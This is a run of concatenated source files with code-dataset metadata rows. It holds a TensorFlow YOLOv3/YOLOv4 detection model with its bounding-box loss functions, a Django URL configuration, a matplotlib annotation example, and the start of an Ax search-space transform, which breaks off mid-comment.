elif activate_type == "mish":
conv = mish(conv)
return conv
def mish(x):
return x * tf.math.tanh(tf.math.softplus(x))
def residual_block(input_layer, input_channel, filter_num1, filter_num2, activate_type='leaky'):
short_cut = input_layer
conv = convolutional(input_layer, filters_shape=(1, 1, input_channel, filter_num1), activate_type=activate_type)
conv = convolutional(conv , filters_shape=(3, 3, filter_num1, filter_num2), activate_type=activate_type)
residual_output = short_cut + conv
return residual_output
def upsample(input_layer):
return tf.image.resize(input_layer, (input_layer.shape[1] * 2, input_layer.shape[2] * 2), method='nearest')
def route_group(input_layer, groups, group_id):
convs = tf.split(input_layer, num_or_size_splits=groups, axis=-1)
return convs[group_id]
def darknet53(input_data):
input_data = convolutional(input_data, (3, 3, 3, 32))
input_data = convolutional(input_data, (3, 3, 32, 64), downsample=True)
for i in range(1):
input_data = residual_block(input_data, 64, 32, 64)
input_data = convolutional(input_data, (3, 3, 64, 128), downsample=True)
for i in range(2):
input_data = residual_block(input_data, 128, 64, 128)
input_data = convolutional(input_data, (3, 3, 128, 256), downsample=True)
for i in range(8):
input_data = residual_block(input_data, 256, 128, 256)
route_1 = input_data
input_data = convolutional(input_data, (3, 3, 256, 512), downsample=True)
for i in range(8):
input_data = residual_block(input_data, 512, 256, 512)
route_2 = input_data
input_data = convolutional(input_data, (3, 3, 512, 1024), downsample=True)
for i in range(4):
input_data = residual_block(input_data, 1024, 512, 1024)
return route_1, route_2, input_data
def cspdarknet53(input_data):
input_data = convolutional(input_data, (3, 3, 3, 32), activate_type="mish")
input_data = convolutional(input_data, (3, 3, 32, 64), downsample=True, activate_type="mish")
route = input_data
route = convolutional(route, (1, 1, 64, 64), activate_type="mish")
input_data = convolutional(input_data, (1, 1, 64, 64), activate_type="mish")
for i in range(1):
input_data = residual_block(input_data, 64, 32, 64, activate_type="mish")
input_data = convolutional(input_data, (1, 1, 64, 64), activate_type="mish")
input_data = tf.concat([input_data, route], axis=-1)
input_data = convolutional(input_data, (1, 1, 128, 64), activate_type="mish")
input_data = convolutional(input_data, (3, 3, 64, 128), downsample=True, activate_type="mish")
route = input_data
route = convolutional(route, (1, 1, 128, 64), activate_type="mish")
input_data = convolutional(input_data, (1, 1, 128, 64), activate_type="mish")
for i in range(2):
input_data = residual_block(input_data, 64, 64, 64, activate_type="mish")
input_data = convolutional(input_data, (1, 1, 64, 64), activate_type="mish")
input_data = tf.concat([input_data, route], axis=-1)
input_data = convolutional(input_data, (1, 1, 128, 128), activate_type="mish")
input_data = convolutional(input_data, (3, 3, 128, 256), downsample=True, activate_type="mish")
route = input_data
route = convolutional(route, (1, 1, 256, 128), activate_type="mish")
input_data = convolutional(input_data, (1, 1, 256, 128), activate_type="mish")
for i in range(8):
input_data = residual_block(input_data, 128, 128, 128, activate_type="mish")
input_data = convolutional(input_data, (1, 1, 128, 128), activate_type="mish")
input_data = tf.concat([input_data, route], axis=-1)
input_data = convolutional(input_data, (1, 1, 256, 256), activate_type="mish")
route_1 = input_data
input_data = convolutional(input_data, (3, 3, 256, 512), downsample=True, activate_type="mish")
route = input_data
route = convolutional(route, (1, 1, 512, 256), activate_type="mish")
input_data = convolutional(input_data, (1, 1, 512, 256), activate_type="mish")
for i in range(8):
input_data = residual_block(input_data, 256, 256, 256, activate_type="mish")
input_data = convolutional(input_data, (1, 1, 256, 256), activate_type="mish")
input_data = tf.concat([input_data, route], axis=-1)
input_data = convolutional(input_data, (1, 1, 512, 512), activate_type="mish")
route_2 = input_data
input_data = convolutional(input_data, (3, 3, 512, 1024), downsample=True, activate_type="mish")
route = input_data
route = convolutional(route, (1, 1, 1024, 512), activate_type="mish")
input_data = convolutional(input_data, (1, 1, 1024, 512), activate_type="mish")
for i in range(4):
input_data = residual_block(input_data, 512, 512, 512, activate_type="mish")
input_data = convolutional(input_data, (1, 1, 512, 512), activate_type="mish")
input_data = tf.concat([input_data, route], axis=-1)
input_data = convolutional(input_data, (1, 1, 1024, 1024), activate_type="mish")
input_data = convolutional(input_data, (1, 1, 1024, 512))
input_data = convolutional(input_data, (3, 3, 512, 1024))
input_data = convolutional(input_data, (1, 1, 1024, 512))
input_data = tf.concat([tf.nn.max_pool(input_data, ksize=13, padding='SAME', strides=1), tf.nn.max_pool(input_data, ksize=9, padding='SAME', strides=1)
, tf.nn.max_pool(input_data, ksize=5, padding='SAME', strides=1), input_data], axis=-1)
input_data = convolutional(input_data, (1, 1, 2048, 512))
input_data = convolutional(input_data, (3, 3, 512, 1024))
input_data = convolutional(input_data, (1, 1, 1024, 512))
return route_1, route_2, input_data
def darknet19_tiny(input_data):
input_data = convolutional(input_data, (3, 3, 3, 16))
input_data = MaxPool2D(2, 2, 'same')(input_data)
input_data = convolutional(input_data, (3, 3, 16, 32))
input_data = MaxPool2D(2, 2, 'same')(input_data)
input_data = convolutional(input_data, (3, 3, 32, 64))
input_data = MaxPool2D(2, 2, 'same')(input_data)
input_data = convolutional(input_data, (3, 3, 64, 128))
input_data = MaxPool2D(2, 2, 'same')(input_data)
input_data = convolutional(input_data, (3, 3, 128, 256))
route_1 = input_data
input_data = MaxPool2D(2, 2, 'same')(input_data)
input_data = convolutional(input_data, (3, 3, 256, 512))
input_data = MaxPool2D(2, 1, 'same')(input_data)
input_data = convolutional(input_data, (3, 3, 512, 1024))
return route_1, input_data
def cspdarknet53_tiny(input_data): # naming assumed: tiny CSPDarknet53 backbone
input_data = convolutional(input_data, (3, 3, 3, 32), downsample=True)
input_data = convolutional(input_data, (3, 3, 32, 64), downsample=True)
input_data = convolutional(input_data, (3, 3, 64, 64))
route = input_data
input_data = route_group(input_data, 2, 1)
input_data = convolutional(input_data, (3, 3, 32, 32))
route_1 = input_data
input_data = convolutional(input_data, (3, 3, 32, 32))
input_data = tf.concat([input_data, route_1], axis=-1)
input_data = convolutional(input_data, (1, 1, 32, 64))
input_data = tf.concat([route, input_data], axis=-1)
input_data = MaxPool2D(2, 2, 'same')(input_data)
input_data = convolutional(input_data, (3, 3, 64, 128))
route = input_data
input_data = route_group(input_data, 2, 1)
input_data = convolutional(input_data, (3, 3, 64, 64))
route_1 = input_data
input_data = convolutional(input_data, (3, 3, 64, 64))
input_data = tf.concat([input_data, route_1], axis=-1)
input_data = convolutional(input_data, (1, 1, 64, 128))
input_data = tf.concat([route, input_data], axis=-1)
input_data = MaxPool2D(2, 2, 'same')(input_data)
input_data = convolutional(input_data, (3, 3, 128, 256))
route = input_data
input_data = route_group(input_data, 2, 1)
input_data = convolutional(input_data, (3, 3, 128, 128))
route_1 = input_data
input_data = convolutional(input_data, (3, 3, 128, 128))
input_data = tf.concat([input_data, route_1], axis=-1)
input_data = convolutional(input_data, (1, 1, 128, 256))
route_1 = input_data
input_data = tf.concat([route, input_data], axis=-1)
input_data = MaxPool2D(2, 2, 'same')(input_data)
input_data = convolutional(input_data, (3, 3, 512, 512))
return route_1, input_data
def YOLOv3(input_layer, NUM_CLASS):
# After the input layer enters the Darknet-53 network, we get three branches
route_1, route_2, conv = darknet53(input_layer)
    # five consecutive convolution (DBL: Conv + BN + LeakyReLU) operations
conv = convolutional(conv, (1, 1, 1024, 512))
conv = convolutional(conv, (3, 3, 512, 1024))
conv = convolutional(conv, (1, 1, 1024, 512))
conv = convolutional(conv, (3, 3, 512, 1024))
conv = convolutional(conv, (1, 1, 1024, 512))
conv_lobj_branch = convolutional(conv, (3, 3, 512, 1024))
    # conv_lbbox is used to predict large-sized objects, Shape = [None, 13, 13, 255]
conv_lbbox = convolutional(conv_lobj_branch, (1, 1, 1024, 3*(NUM_CLASS + 5)), activate=False, bn=False)
conv = convolutional(conv, (1, 1, 512, 256))
    # nearest-neighbor upsampling has no learnable weights, so this step adds
    # no extra parameters to the network
conv = upsample(conv)
conv = tf.concat([conv, route_2], axis=-1)
conv = convolutional(conv, (1, 1, 768, 256))
conv = convolutional(conv, (3, 3, 256, 512))
conv = convolutional(conv, (1, 1, 512, 256))
conv = convolutional(conv, (3, 3, 256, 512))
conv = convolutional(conv, (1, 1, 512, 256))
conv_mobj_branch = convolutional(conv, (3, 3, 256, 512))
# conv_mbbox is used to predict medium-sized objects, shape = [None, 26, 26, 255]
conv_mbbox = convolutional(conv_mobj_branch, (1, 1, 512, 3*(NUM_CLASS + 5)), activate=False, bn=False)
conv = convolutional(conv, (1, 1, 256, 128))
conv = upsample(conv)
conv = tf.concat([conv, route_1], axis=-1)
conv = convolutional(conv, (1, 1, 384, 128))
conv = convolutional(conv, (3, 3, 128, 256))
conv = convolutional(conv, (1, 1, 256, 128))
conv = convolutional(conv, (3, 3, 128, 256))
conv = convolutional(conv, (1, 1, 256, 128))
conv_sobj_branch = convolutional(conv, (3, 3, 128, 256))
# conv_sbbox is used to predict small size objects, shape = [None, 52, 52, 255]
conv_sbbox = convolutional(conv_sobj_branch, (1, 1, 256, 3*(NUM_CLASS +5)), activate=False, bn=False)
return [conv_sbbox, conv_mbbox, conv_lbbox]
def YOLOv4(input_layer, NUM_CLASS):
route_1, route_2, conv = cspdarknet53(input_layer)
route = conv
conv = convolutional(conv, (1, 1, 512, 256))
conv = upsample(conv)
route_2 = convolutional(route_2, (1, 1, 512, 256))
conv = tf.concat([route_2, conv], axis=-1)
conv = convolutional(conv, (1, 1, 512, 256))
conv = convolutional(conv, (3, 3, 256, 512))
conv = convolutional(conv, (1, 1, 512, 256))
conv = convolutional(conv, (3, 3, 256, 512))
conv = convolutional(conv, (1, 1, 512, 256))
route_2 = conv
conv = convolutional(conv, (1, 1, 256, 128))
conv = upsample(conv)
route_1 = convolutional(route_1, (1, 1, 256, 128))
conv = tf.concat([route_1, conv], axis=-1)
conv = convolutional(conv, (1, 1, 256, 128))
conv = convolutional(conv, (3, 3, 128, 256))
conv = convolutional(conv, (1, 1, 256, 128))
conv = convolutional(conv, (3, 3, 128, 256))
conv = convolutional(conv, (1, 1, 256, 128))
route_1 = conv
conv = convolutional(conv, (3, 3, 128, 256))
conv_sbbox = convolutional(conv, (1, 1, 256, 3 * (NUM_CLASS + 5)), activate=False, bn=False)
conv = convolutional(route_1, (3, 3, 128, 256), downsample=True)
conv = tf.concat([conv, route_2], axis=-1)
conv = convolutional(conv, (1, 1, 512, 256))
conv = convolutional(conv, (3, 3, 256, 512))
conv = convolutional(conv, (1, 1, 512, 256))
conv = convolutional(conv, (3, 3, 256, 512))
conv = convolutional(conv, (1, 1, 512, 256))
route_2 = conv
conv = convolutional(conv, (3, 3, 256, 512))
conv_mbbox = convolutional(conv, (1, 1, 512, 3 * (NUM_CLASS + 5)), activate=False, bn=False)
conv = convolutional(route_2, (3, 3, 256, 512), downsample=True)
conv = tf.concat([conv, route], axis=-1)
conv = convolutional(conv, (1, 1, 1024, 512))
conv = convolutional(conv, (3, 3, 512, 1024))
conv = convolutional(conv, (1, 1, 1024, 512))
conv = convolutional(conv, (3, 3, 512, 1024))
conv = convolutional(conv, (1, 1, 1024, 512))
conv = convolutional(conv, (3, 3, 512, 1024))
conv_lbbox = convolutional(conv, (1, 1, 1024, 3 * (NUM_CLASS + 5)), activate=False, bn=False)
return [conv_sbbox, conv_mbbox, conv_lbbox]
def YOLOv3_tiny(input_layer, NUM_CLASS):
    # After the input layer enters the Darknet-19 tiny network, we get two branches
route_1, conv = darknet19_tiny(input_layer)
conv = convolutional(conv, (1, 1, 1024, 256))
conv_lobj_branch = convolutional(conv, (3, 3, 256, 512))
    # conv_lbbox is used to predict large-sized objects, Shape = [None, 13, 13, 255]
conv_lbbox = convolutional(conv_lobj_branch, (1, 1, 512, 3*(NUM_CLASS + 5)), activate=False, bn=False)
conv = convolutional(conv, (1, 1, 256, 128))
    # nearest-neighbor upsampling has no learnable weights, so this step adds
    # no extra parameters to the network
conv = upsample(conv)
conv = tf.concat([conv, route_1], axis=-1)
conv_mobj_branch = convolutional(conv, (3, 3, 128, 256))
    # conv_mbbox is used to predict medium size objects, shape = [None, 26, 26, 255]
conv_mbbox = convolutional(conv_mobj_branch, (1, 1, 256, 3 * (NUM_CLASS + 5)), activate=False, bn=False)
return [conv_mbbox, conv_lbbox]
def YOLOv4_tiny(input_layer, NUM_CLASS):
route_1, conv = cspdarknet53_tiny(input_layer)
conv = convolutional(conv, (1, 1, 512, 256))
conv_lobj_branch = convolutional(conv, (3, 3, 256, 512))
conv_lbbox = convolutional(conv_lobj_branch, (1, 1, 512, 3 * (NUM_CLASS + 5)), activate=False, bn=False)
conv = convolutional(conv, (1, 1, 256, 128))
conv = upsample(conv)
conv = tf.concat([conv, route_1], axis=-1)
conv_mobj_branch = convolutional(conv, (3, 3, 128, 256))
conv_mbbox = convolutional(conv_mobj_branch, (1, 1, 256, 3 * (NUM_CLASS + 5)), activate=False, bn=False)
return [conv_mbbox, conv_lbbox]
def Create_Yolo(input_size=416, channels=3, training=False, CLASSES=YOLO_COCO_CLASSES):
NUM_CLASS = len(read_class_names(CLASSES))
input_layer = Input([input_size, input_size, channels])
    if TRAIN_YOLO_TINY:
        if YOLO_TYPE == "yolov4":
            conv_tensors = YOLOv4_tiny(input_layer, NUM_CLASS)
        elif YOLO_TYPE == "yolov3":
            conv_tensors = YOLOv3_tiny(input_layer, NUM_CLASS)
    else:
        if YOLO_TYPE == "yolov4":
            conv_tensors = YOLOv4(input_layer, NUM_CLASS)
        elif YOLO_TYPE == "yolov3":
            conv_tensors = YOLOv3(input_layer, NUM_CLASS)
output_tensors = []
for i, conv_tensor in enumerate(conv_tensors):
pred_tensor = decode(conv_tensor, NUM_CLASS, i)
if training: output_tensors.append(conv_tensor)
output_tensors.append(pred_tensor)
Yolo = tf.keras.Model(input_layer, output_tensors)
return Yolo
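
# Hedged sanity check (editor addition): build an inference-mode model and run
# a dummy batch. Assumes the configured class-names file exists, YOLO_TYPE is
# "yolov3" and TRAIN_YOLO_TINY is off; COCO's 80 classes then give three
# scales of shape (1, S, S, 3, 85) for S in (52, 26, 13).
def _demo_create_yolo():
    yolo = Create_Yolo(input_size=416, channels=3, training=False)
    dummy = tf.random.uniform((1, 416, 416, 3))
    for pred in yolo(dummy):
        print(pred.shape)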
def decode(conv_output, NUM_CLASS, i=0):
# where i = 0, 1 or 2 to correspond to the three grid scales
conv_shape = tf.shape(conv_output)
batch_size = conv_shape[0]
output_size = conv_shape[1]
conv_output = tf.reshape(conv_output, (batch_size, output_size, output_size, 3, 5 + NUM_CLASS))
    # split the raw output into: center offsets (dx, dy), size offsets (dw, dh),
    # objectness confidence, and per-class probabilities
    conv_raw_dxdy, conv_raw_dwdh, conv_raw_conf, conv_raw_prob = tf.split(conv_output, (2, 2, 1, NUM_CLASS), axis=-1)
    # next, draw the grid; output_size equals 13, 26 or 52
xy_grid = tf.meshgrid(tf.range(output_size), tf.range(output_size))
xy_grid = tf.expand_dims(tf.stack(xy_grid, axis=-1), axis=2) # [gx, gy, 1, 2]
xy_grid = tf.tile(tf.expand_dims(xy_grid, axis=0), [batch_size, 1, 1, 3, 1])
xy_grid = tf.cast(xy_grid, tf.float32)
# Calculate the center position of the prediction box:
pred_xy = (tf.sigmoid(conv_raw_dxdy) + xy_grid) * STRIDES[i]
# Calculate the length and width of the prediction box:
pred_wh = (tf.exp(conv_raw_dwdh) * ANCHORS[i]) * STRIDES[i]
pred_xywh = tf.concat([pred_xy, pred_wh], axis=-1)
    pred_conf = tf.sigmoid(conv_raw_conf) # objectness confidence of the prediction box
    pred_prob = tf.sigmoid(conv_raw_prob) # per-class probability of the prediction box
    return tf.concat([pred_xywh, pred_conf, pred_prob], axis=-1)
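
# Hedged shape check (editor addition): decode() maps raw conv output to
# absolute-coordinate predictions; with i=2 (the coarsest scale, stride 32)
# a 416x416 input yields a 13x13 grid.
def _demo_decode():
    num_class = 80
    conv = tf.random.normal((1, 13, 13, 3 * (5 + num_class)))
    pred = decode(conv, num_class, i=2)
    print(pred.shape)  # (1, 13, 13, 3, 85)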
def bbox_iou(boxes1, boxes2):
boxes1_area = boxes1[..., 2] * boxes1[..., 3]
boxes2_area = boxes2[..., 2] * boxes2[..., 3]
boxes1 = tf.concat([boxes1[..., :2] - boxes1[..., 2:] * 0.5,
boxes1[..., :2] + boxes1[..., 2:] * 0.5], axis=-1)
boxes2 = tf.concat([boxes2[..., :2] - boxes2[..., 2:] * 0.5,
boxes2[..., :2] + boxes2[..., 2:] * 0.5], axis=-1)
left_up = tf.maximum(boxes1[..., :2], boxes2[..., :2])
right_down = tf.minimum(boxes1[..., 2:], boxes2[..., 2:])
inter_section = tf.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
union_area = boxes1_area + boxes2_area - inter_area
return 1.0 * inter_area / union_area
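
# Tiny numeric check (editor addition) for bbox_iou; boxes are [cx, cy, w, h]:
def _demo_bbox_iou():
    a = tf.constant([5., 5., 4., 4.])  # corners (3, 3)-(7, 7), area 16
    b = tf.constant([6., 6., 4., 4.])  # corners (4, 4)-(8, 8), area 16
    # intersection 3*3 = 9, union 16 + 16 - 9 = 23, IoU = 9/23 ~ 0.391
    print(bbox_iou(a, b).numpy())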
def bbox_giou(boxes1, boxes2):
boxes1 = tf.concat([boxes1[..., :2] - boxes1[..., 2:] * 0.5,
boxes1[..., :2] + boxes1[..., 2:] * 0.5], axis=-1)
boxes2 = tf.concat([boxes2[..., :2] - boxes2[..., 2:] * 0.5,
boxes2[..., :2] + boxes2[..., 2:] * 0.5], axis=-1)
boxes1 = tf.concat([tf.minimum(boxes1[..., :2], boxes1[..., 2:]),
tf.maximum(boxes1[..., :2], boxes1[..., 2:])], axis=-1)
boxes2 = tf.concat([tf.minimum(boxes2[..., :2], boxes2[..., 2:]),
tf.maximum(boxes2[..., :2], boxes2[..., 2:])], axis=-1)
boxes1_area = (boxes1[..., 2] - boxes1[..., 0]) * (boxes1[..., 3] - boxes1[..., 1])
boxes2_area = (boxes2[..., 2] - boxes2[..., 0]) * (boxes2[..., 3] - boxes2[..., 1])
left_up = tf.maximum(boxes1[..., :2], boxes2[..., :2])
right_down = tf.minimum(boxes1[..., 2:], boxes2[..., 2:])
inter_section = tf.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
union_area = boxes1_area + boxes2_area - inter_area
# Calculate the iou value between the two bounding boxes
iou = inter_area / union_area
# Calculate the coordinates of the upper left corner and the lower right corner of the smallest closed convex surface
enclose_left_up = tf.minimum(boxes1[..., :2], boxes2[..., :2])
enclose_right_down = tf.maximum(boxes1[..., 2:], boxes2[..., 2:])
enclose = tf.maximum(enclose_right_down - enclose_left_up, 0.0)
# Calculate the area of the smallest closed convex surface C
enclose_area = enclose[..., 0] * enclose[..., 1]
# Calculate the GIoU value according to the GioU formula
giou = iou - 1.0 * (enclose_area - union_area) / enclose_area
return giou
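# Continuing the worked example from bbox_iou: for box1 = [2, 2, 2, 2] and
# box2 = [3, 3, 2, 2], the smallest enclosing box spans (1, 1)-(4, 4) with
# area 9, so GIoU = 1/7 - (9 - 7)/9 ~= 0.143 - 0.222 ~= -0.079. Unlike IoU,
# GIoU stays informative (and negative) even when boxes barely overlap or are
# disjoint, which is why it is used for the regression loss below.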
# testing (should be better than giou)
def bbox_ciou(boxes1, boxes2):
boxes1_coor = tf.concat([boxes1[..., :2] - boxes1[..., 2:] * 0.5,
boxes1[..., :2] + boxes1[..., 2:] * 0.5], axis=-1)
boxes2_coor = tf.concat([boxes2[..., :2] - boxes2[..., 2:] * 0.5,
boxes2[..., :2] + boxes2[..., 2:] * 0.5], axis=-1)
# Smallest enclosing box: min over the top-left corners, max over the bottom-right corners
left = tf.minimum(boxes1_coor[..., 0], boxes2_coor[..., 0])
up = tf.minimum(boxes1_coor[..., 1], boxes2_coor[..., 1])
right = tf.maximum(boxes1_coor[..., 2], boxes2_coor[..., 2])
down = tf.maximum(boxes1_coor[..., 3], boxes2_coor[..., 3])
c = (right - left) * (right - left) + (down - up) * (down - up)  # squared diagonal of the enclosing box
iou = bbox_iou(boxes1, boxes2)
u = (boxes1[..., 0] - boxes2[..., 0]) * (boxes1[..., 0] - boxes2[..., 0]) + (boxes1[..., 1] - boxes2[..., 1]) * (boxes1[..., 1] - boxes2[..., 1])
d = u / c
ar_gt = boxes2[..., 2] / boxes2[..., 3]
ar_pred = boxes1[..., 2] / boxes1[..., 3]
ar_loss = 4 / (np.pi * np.pi) * (tf.atan(ar_gt) - tf.atan(ar_pred)) * (tf.atan(ar_gt) - tf.atan(ar_pred))
alpha = ar_loss / (1 - iou + ar_loss + 0.000001)
ciou_term = d + alpha * ar_loss
return iou - ciou_term
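# Sanity check for bbox_ciou: for two identical boxes, iou = 1, the center
# distance term d = 0 and the aspect-ratio term ar_loss = 0, so ciou = 1 and
# the corresponding loss contribution 1 - ciou is exactly 0, as expected.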
def compute_loss(pred, conv, label, bboxes, i=0, CLASSES=YOLO_COCO_CLASSES):
NUM_CLASS = len(read_class_names(CLASSES))
conv_shape = tf.shape(conv)
batch_size = conv_shape[0]
output_size = conv_shape[1]
input_size = STRIDES[i] * output_size
conv = tf.reshape(conv, (batch_size, output_size, output_size, 3, 5 + NUM_CLASS))
conv_raw_conf = conv[:, :, :, :, 4:5]
conv_raw_prob = conv[:, :, :, :, 5:]
pred_xywh = pred[:, :, :, :, 0:4]
pred_conf = pred[:, :, :, :, 4:5]
label_xywh = label[:, :, :, :, 0:4]
respond_bbox = label[:, :, :, :, 4:5]
label_prob = label[:, :, :, :, 5:]
giou = tf.expand_dims(bbox_giou(pred_xywh, label_xywh), axis=-1)
input_size = tf.cast(input_size, tf.float32)
bbox_loss_scale = 2.0 - 1.0 * label_xywh[:, :, :, :, 2:3] * label_xywh[:, :, :, :, 3:4] / (input_size ** 2)
giou_loss = respond_bbox * bbox_loss_scale * (1 - giou)
iou = bbox_iou(pred_xywh[:, :, :, :, np.newaxis, :], bboxes[:, np.newaxis, np.newaxis, np.newaxis, :, :])
# For each predicted box, find its largest IoU against any ground-truth box
max_iou = tf.expand_dims(tf.reduce_max(iou, axis=-1), axis=-1)
# If that largest IoU falls below the threshold, treat the prediction as background (no object)
respond_bgd = (1.0 - respond_bbox) * tf.cast( max_iou < YOLO_IOU_LOSS_THRESH, tf.float32 )
conf_focal = tf.pow(respond_bbox - pred_conf, 2)
# Confidence loss: push predicted confidence toward 1 for grid cells that
# contain an object and toward 0 for background cells
conf_loss = conf_focal * (
respond_bbox * tf.nn.sigmoid_cross_entropy_with_logits(labels=respond_bbox, logits=conv_raw_conf)
+
respond_bgd * tf.nn.sigmoid_cross_entropy_with_logits(labels=respond_bbox, logits=conv_raw_conf)
)
prob_loss = respond_bbox * tf.nn.sigmoid_cross_entropy_with_logits(labels=label_prob, logits=conv_raw_prob)
giou_loss = tf.reduce_mean(tf.reduce_sum(giou_loss, axis=[1,2,3,4]))
conf_loss = tf.reduce_mean(tf.reduce_sum(conf_loss, axis=[1,2,3,4]))
prob_loss = tf.reduce_mean(tf.reduce_sum(prob_loss, axis=[1,2,3,4]))
return giou_loss, conf_loss, prob_loss
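# A hedged sketch of how the pieces above fit into one training step (assumes
# the full three-scale model, so the model outputs alternate (conv, pred) per
# scale when built with training=True; targets[i] is an illustrative
# (label, bboxes) pair for scale i):
#
# yolo = Create_Yolo(input_size=416, training=True)
# optimizer = tf.keras.optimizers.Adam()
#
# def train_step(image_data, targets):
#     with tf.GradientTape() as tape:
#         outputs = yolo(image_data, training=True)
#         giou_loss = conf_loss = prob_loss = 0.0
#         for i in range(3):
#             conv, pred = outputs[i * 2], outputs[i * 2 + 1]
#             losses = compute_loss(pred, conv, *targets[i], i=i)
#             giou_loss, conf_loss, prob_loss = (giou_loss + losses[0],
#                                                conf_loss + losses[1],
#                                                prob_loss + losses[2])
#         total_loss = giou_loss + conf_loss + prob_loss
#     grads = tape.gradient(total_loss, yolo.trainable_variables)
#     optimizer.apply_gradients(zip(grads, yolo.trainable_variables))
#     return total_loss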
| 45.201754
| 155
| 0.645954
|
e805211ad3f483682aee21facd5a3d5979a0dd91
| 530
|
py
|
Python
|
restaurateur/urls.py
|
FaHoLo/Star_burger
|
e0d13400a9bd3f8d7427f62dbc6375ca275ee158
|
[
"MIT"
] | null | null | null |
restaurateur/urls.py
|
FaHoLo/Star_burger
|
e0d13400a9bd3f8d7427f62dbc6375ca275ee158
|
[
"MIT"
] | null | null | null |
restaurateur/urls.py
|
FaHoLo/Star_burger
|
e0d13400a9bd3f8d7427f62dbc6375ca275ee158
|
[
"MIT"
] | 1
|
2021-06-25T21:47:34.000Z
|
2021-06-25T21:47:34.000Z
|
from django.urls import path
from django.shortcuts import redirect
from . import views
app_name = "restaurateur"
urlpatterns = [
path('', lambda request: redirect('restaurateur:ProductsView')),
path('products/', views.view_products, name="ProductsView"),
path('restaurants/', views.view_restaurants, name="RestaurantView"),
path('orders/', views.view_orders, name="view_orders"),
path('login/', views.LoginView.as_view(), name="login"),
path('logout/', views.LogoutView.as_view(), name="logout"),
]
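# A hedged usage sketch: with app_name set above, the named routes are resolved
# via their namespaced names (route names are from this module; view behaviour
# is assumed):
#
# from django.urls import reverse
# reverse('restaurateur:ProductsView')  # -> '/products/'
# reverse('restaurateur:view_orders')   # -> '/orders/'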
| 26.5
| 72
| 0.70566
|
846afd7b9018d603bc640de39444e34402aeda91
| 337
|
py
|
Python
|
doc/pyplots/annotation_basic.py
|
pierre-haessig/matplotlib
|
0d945044ca3fbf98cad55912584ef80911f330c6
|
[
"MIT",
"PSF-2.0",
"BSD-3-Clause"
] | 16
|
2016-06-14T19:45:35.000Z
|
2020-11-30T19:02:58.000Z
|
doc/pyplots/annotation_basic.py
|
pierre-haessig/matplotlib
|
0d945044ca3fbf98cad55912584ef80911f330c6
|
[
"MIT",
"PSF-2.0",
"BSD-3-Clause"
] | 7
|
2015-05-08T19:36:25.000Z
|
2015-06-30T15:32:17.000Z
|
doc/pyplots/annotation_basic.py
|
pierre-haessig/matplotlib
|
0d945044ca3fbf98cad55912584ef80911f330c6
|
[
"MIT",
"PSF-2.0",
"BSD-3-Clause"
] | 14
|
2015-10-05T04:15:46.000Z
|
2020-06-11T18:06:02.000Z
|
import numpy as np
import matplotlib.pyplot as plt
fig = plt.figure()
ax = fig.add_subplot(111)
t = np.arange(0.0, 5.0, 0.01)
s = np.cos(2*np.pi*t)
line, = ax.plot(t, s, lw=2)
ax.annotate('local max', xy=(2, 1), xytext=(3, 1.5),
arrowprops=dict(facecolor='black', shrink=0.05),
)
ax.set_ylim(-2,2)
plt.show()
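# In the annotate() call above, `xy` is the data point being marked (the cosine
# curve's local max at t=2) and `xytext` is where the label is drawn. A minimal
# variant with a simpler arrow style (illustrative only):
#
# ax.annotate('local max', xy=(2, 1), xytext=(3, 1.5),
#             arrowprops=dict(arrowstyle='->'))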
| 19.823529
| 60
| 0.602374
|
e05e9cf02d33b705f9c5dca07e99d1c309de8d51
| 3,597
|
py
|
Python
|
ax/modelbridge/transforms/int_range_to_choice.py
|
sparks-baird/Ax
|
57ba8714902ac218eb87dc2f90090678aa307a43
|
[
"MIT"
] | null | null | null |
ax/modelbridge/transforms/int_range_to_choice.py
|
sparks-baird/Ax
|
57ba8714902ac218eb87dc2f90090678aa307a43
|
[
"MIT"
] | null | null | null |
ax/modelbridge/transforms/int_range_to_choice.py
|
sparks-baird/Ax
|
57ba8714902ac218eb87dc2f90090678aa307a43
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import TYPE_CHECKING, Dict, List, Optional, Set
from ax.core.observation import ObservationData, ObservationFeatures
from ax.core.parameter import ChoiceParameter, Parameter, ParameterType, RangeParameter
from ax.core.search_space import RobustSearchSpace, SearchSpace
from ax.modelbridge.transforms.base import Transform
from ax.models.types import TConfig
if TYPE_CHECKING:
# import as module to make sphinx-autodoc-typehints happy
from ax import modelbridge as modelbridge_module # noqa F401 # pragma: no cover
class IntRangeToChoice(Transform):
"""Convert a RangeParameter of type int to a ordered ChoiceParameter.
Transform is done in-place.
"""
def __init__(
self,
search_space: SearchSpace,
observation_features: List[ObservationFeatures],
observation_data: List[ObservationData],
modelbridge: Optional["modelbridge_module.base.ModelBridge"] = None,
config: Optional[TConfig] = None,
) -> None:
# Identify parameters that should be transformed
self.transform_parameters: Set[str] = {
p_name
for p_name, p in search_space.parameters.items()
if isinstance(p, RangeParameter) and p.parameter_type == ParameterType.INT
}
def _transform_search_space(self, search_space: SearchSpace) -> SearchSpace:
transformed_parameters: Dict[str, Parameter] = {}
for p_name, p in search_space.parameters.items():
if p_name in self.transform_parameters and isinstance(p, RangeParameter):
# pyre-fixme[6]: Expected `int` for 1st param but got `float`.
values = list(range(p.lower, p.upper + 1))
target_value = (
None
if p.target_value is None
else next(i for i, v in enumerate(values) if v == p.target_value)
)
transformed_parameters[p_name] = ChoiceParameter(
name=p_name,
parameter_type=p.parameter_type,
# Expected `List[Optional[typing.Union[bool, float, str]]]` for
# 4th parameter `values` to call
# `ax.core.parameter.ChoiceParameter.__init__` but got
# `List[int]`.
# pyre-fixme[6]:
values=values,
is_ordered=True,
is_fidelity=p.is_fidelity,
target_value=target_value,
)
else:
transformed_parameters[p.name] = p
new_kwargs = {
"parameters": list(transformed_parameters.values()),
"parameter_constraints": [
pc.clone_with_transformed_parameters(
transformed_parameters=transformed_parameters
)
for pc in search_space.parameter_constraints
],
}
if isinstance(search_space, RobustSearchSpace):
new_kwargs["environmental_variables"] = list(
search_space._environmental_variables.values()
)
# pyre-ignore Incompatible parameter type [6]
new_kwargs["parameter_distributions"] = search_space.parameter_distributions
# pyre-ignore Incompatible parameter type [6]
return search_space.__class__(**new_kwargs)
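# A hedged usage sketch of the transform (objects are illustrative; assumes the
# public Ax parameter/search-space constructors):
#
# ss = SearchSpace(parameters=[
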